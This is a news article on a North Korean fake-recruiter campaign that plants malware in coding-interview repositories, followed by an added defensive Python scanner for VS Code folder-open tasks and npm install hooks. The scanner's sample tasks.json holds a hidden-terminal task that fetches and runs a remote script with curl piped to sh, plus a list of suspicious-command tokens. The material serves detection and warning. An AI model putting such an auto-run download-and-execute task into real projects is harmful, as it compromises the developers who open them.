Source: Cryptopolitan, republished on BTCC Square
North Korean Hackers Target 3,100+ IPs in Sophisticated AI, Crypto, and Finance Job Scam


Published:
2026-01-22 08:52:46

North Korean hackers hit 3,100+ IPs in AI, crypto, finance job scam

State-sponsored cyber operatives are weaponizing career opportunities to infiltrate the world's most innovative sectors.

Rather than a phishing email, the lure is a dream job in artificial intelligence, blockchain development, or quantitative finance. A North Korean-linked advanced persistent threat group has run a coordinated campaign that targeted more than 3,100 unique IP addresses by dangling lucrative positions in front of highly skilled professionals.

The Anatomy of a Modern Digital Heist

The operation does not stop at stealing resumes; it steals network access. Candidates eager to join the cutting edge clone repositories or download what appear to be legitimate technical interview materials or coding challenges, and running that code installs malware that opens a backdoor on the machine, which is often a corporate one. The targets are not random: they are the engineers and analysts building the next generation of financial and technological infrastructure.

Why Crypto and Fintech Are Prime Targets

The digital asset and fintech space is a perfect storm: high-value transactions, rapidly changing security postures, and a global talent hunt. The attackers bypass perimeter defenses by exploiting ambition, since the victim runs the code themselves. Once inside, they can siphon data, harvest browser credentials and session cookies, manipulate transactions, or stay dormant until a large fund movement creates a payday. It is a reminder that in the race for innovation, security often plays catch-up.

A cynical take? Wall Street's old guard might call it karma: the decentralized, borderless future getting a brutal lesson in real-world geopolitics. The provocation is that the very tools promising financial sovereignty are being undermined by a regime funding its ambitions through digital theft. The industry's growth now demands an equal investment in cyber vigilance, because the most valuable token in crypto is not on the blockchain; it is your network access.

North Korea's fake recruitment interview malware campaign

As described by Insikt Group, the "Contagious Interview" campaign relies on operators who pose as recruiters or developers and approach job seekers with technical interview exercises. At least 3,136 individual IP addresses were targeted during the monitoring period, the analysts said.

The attackers presented themselves as representatives of crypto and technology firms and asked candidates to review code, clone repositories, or complete coding tasks. Each of these asks ends with the candidate executing attacker-supplied code on their own machine.

“In several cases, it is likely that job-seeking candidates executed malicious code on corporate devices, creating organizational exposure beyond the individual target,” the threat intelligence firm wrote in its report.

The operation has several aliases in vendor and open-source reporting on North Korean threat activity, including CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, Gwisin Gang, Tenacious Pungsan, UNC5342, Void Dokkaebi, and WaterPlum.

The firm also noted that the operators used Astrill VPN and other IP ranges to administer command-and-control servers hosted in China, while their BeaverTail and GolangGhost servers were spread across 17 hosting providers.

Luring victims with personas, GitHub, and Ukrainian cover stories

Insikt Group identified four online personas linked to PurpleBravo, Recorded Future's name for the group, through an investigation of malicious GitHub repositories, social media discussion of crypto scams, and a hacking network intelligence service.

According to the report, these profiles consistently claimed to be based in Odessa, Ukraine, while targeting job seekers from South Asia. Insikt said it could not determine why Ukrainian identities were used in the ruse.

In one fake project, the operators used a website advertising a token named after a food brand, but researchers could not establish any verified connection between the coin and the company it referenced. The project's official Telegram channel is populated by scammers, automated bots, and malicious links.

The operation also featured two related remote access trojans, GolangGhost and PylangGhost, which share the same command set and automate the theft of browser credentials and cookies. GolangGhost runs on several operating systems, whereas PylangGhost is a Python port that only works on Windows and can bypass Chrome's app-bound credential protection in version 127 and later.

Insikt Group found Telegram channels advertising LinkedIn and Upwork accounts for sale, with the sellers using proxy, VPS and SMS-verification services such as proxy-seller[.]com, powervps[.]net, residentialvps[.]com, lunaproxy[.]com, and sms-activate[.]io to hide their locations. The operator was also seen interacting with the cryptocurrency trading platform MEXC Exchange.

Backdoored repositories that abuse Visual Studio Code workspace tasks

On Monday, Jamf Threat Labs reported that North Korea-linked actors have been weaponizing Microsoft Visual Studio Code project configuration to backdoor developer systems. The tactic was first identified in December 2025 and has since been refined, the analysts said.

According to Jamf security researcher Thijs Xhaflaire, the chain ends with an implant that gives the attackers remote code execution on the victim's machine. It begins when a target clones a malicious Git repository and opens it in VS Code.

“When the project is opened, Visual Studio Code prompts the user to trust the repository author. If that trust is granted, the application automatically processes the repository’s tasks.json configuration file, which can result in embedded arbitrary commands being executed on the system,” Thijs Xhaflaire wrote.
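A triage check for the two lures above (the "clone this repository" task and the tasks.json auto-run that Jamf describes), as an added example that is not code from the article, Jamf Threat Labs or Insikt Group. It scans a cloned repository for a `.vscode/tasks.json` task whose `runOptions.runOn` is `folderOpen`, which VS Code starts as soon as the user grants workspace trust, and, as a generalisation the article does not mention, for npm lifecycle scripts that run during `npm install`. The two sample repositories, the placeholder URL and the file names in them are constructed here for the demonstration.

```python
"""Triage a cloned 'interview' repository for hooks that run code without an explicit action.
Added example, not code from the article, Jamf Threat Labs or Insikt Group. Covers the
tasks.json mechanism Jamf describes (runOptions.runOn = "folderOpen") and, as a
generalisation, npm lifecycle scripts. Sample repositories are constructed inline;
the URL and file names in them are placeholders."""
import json
import re
import tempfile
from pathlib import Path

NPM_LIFECYCLE = {"preinstall", "install", "postinstall", "prepare"}
# Tokens suggesting a hook fetches, decodes or evals a second stage (heuristic only).
SUSPICIOUS = ("curl ", "wget ", "Invoke-WebRequest", "base64", "child_process", "eval(", "| sh")

def strip_jsonc(text: str) -> str:
    """tasks.json is JSONC: drop // comments outside strings and trailing commas."""
    out, in_str, i = [], False, 0
    while i < len(text):
        ch = text[i]
        if in_str:
            out.append(ch)
            if ch == "\\" and i + 1 < len(text):  # keep the escaped character verbatim
                out.append(text[i + 1])
                i += 1
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str = True
            out.append(ch)
        elif text.startswith("//", i):  # comment runs to end of line; keep the newline
            nl = text.find("\n", i)
            i = len(text) if nl == -1 else nl
            continue
        else:
            out.append(ch)
        i += 1
    return re.sub(r",(\s*[\]}])", r"\1", "".join(out))

def _risk(command: str) -> str:
    return "high" if any(tok in command for tok in SUSPICIOUS) else "medium"

def scan_vscode_tasks(repo: Path) -> list:
    """Flag tasks VS Code starts on folder open once the user grants workspace trust."""
    path = repo / ".vscode" / "tasks.json"
    if not path.is_file():
        return []
    findings = []
    for task in json.loads(strip_jsonc(path.read_text(encoding="utf-8"))).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
            findings.append({"kind": "vscode-folderOpen-task", "file": ".vscode/tasks.json",
                             "label": task.get("label"), "command": cmd, "risk": _risk(cmd)})
    return findings

def scan_npm_scripts(repo: Path) -> list:
    """Flag package.json lifecycle scripts, which npm runs during install without prompting."""
    path = repo / "package.json"
    if not path.is_file():
        return []
    scripts = json.loads(path.read_text(encoding="utf-8")).get("scripts", {})
    return [{"kind": "npm-lifecycle-script", "file": "package.json", "label": name,
             "command": cmd, "risk": _risk(cmd)}
            for name, cmd in scripts.items() if name in NPM_LIFECYCLE]

def scan_repo(repo: Path) -> list:
    return scan_vscode_tasks(repo) + scan_npm_scripts(repo)

# Constructed sample repositories (placeholder URL; no real infrastructure).
MALICIOUS_TASKS_JSON = """{
  // the task fires as soon as the folder is trusted, with its terminal hidden
  "version": "2.0.0",
  "tasks": [{
    "label": "prepare-env", "type": "shell", "command": "node",
    "args": ["-e", "require('child_process').exec('curl -s http://placeholder.invalid/s | sh')"],
    "runOptions": { "runOn": "folderOpen" },
    "presentation": { "reveal": "never" },
  }]
}"""
BENIGN_TASKS_JSON = '{"version": "2.0.0", "tasks": [{"label": "build", "type": "shell", "command": "npm run build"}]}'

def build_sample_repo(root: Path, malicious: bool) -> Path:
    repo = root / ("interview-task-malicious" if malicious else "interview-task-benign")
    (repo / ".vscode").mkdir(parents=True)
    (repo / ".vscode" / "tasks.json").write_text(MALICIOUS_TASKS_JSON if malicious else BENIGN_TASKS_JSON)
    scripts = {"test": "jest", "build": "tsc"}
    if malicious:
        scripts["postinstall"] = "node setup.js"  # constructed: runs on `npm install`
    (repo / "package.json").write_text(json.dumps({"name": "interview-task", "scripts": scripts}))
    return repo

def demo() -> dict:
    """Scan one benign and one malicious sample; findings keyed by repository name."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        return {r.name: scan_repo(r) for r in (build_sample_repo(root, False), build_sample_repo(root, True))}

if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, "clean" if not findings else "\n" + "\n".join(
            f"  [{f['risk']}] {f['kind']} in {f['file']}: {f['label']!r} -> {f['command']!r}" for f in findings))
```

Run it on the clone before opening the folder in an editor or running any install step; a `folderOpen` task or a lifecycle script in a "take-home exercise" is a reason to stop. Two settings reduce the blast radius regardless: setting `task.allowAutomaticTasks` to `off` in VS Code user settings stops folder-open tasks even in trusted workspaces, and declining the workspace-trust prompt for recruiter-supplied code keeps the repository in restricted mode. Either way, interview code from an unknown party belongs in a disposable VM, never on a corporate device.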
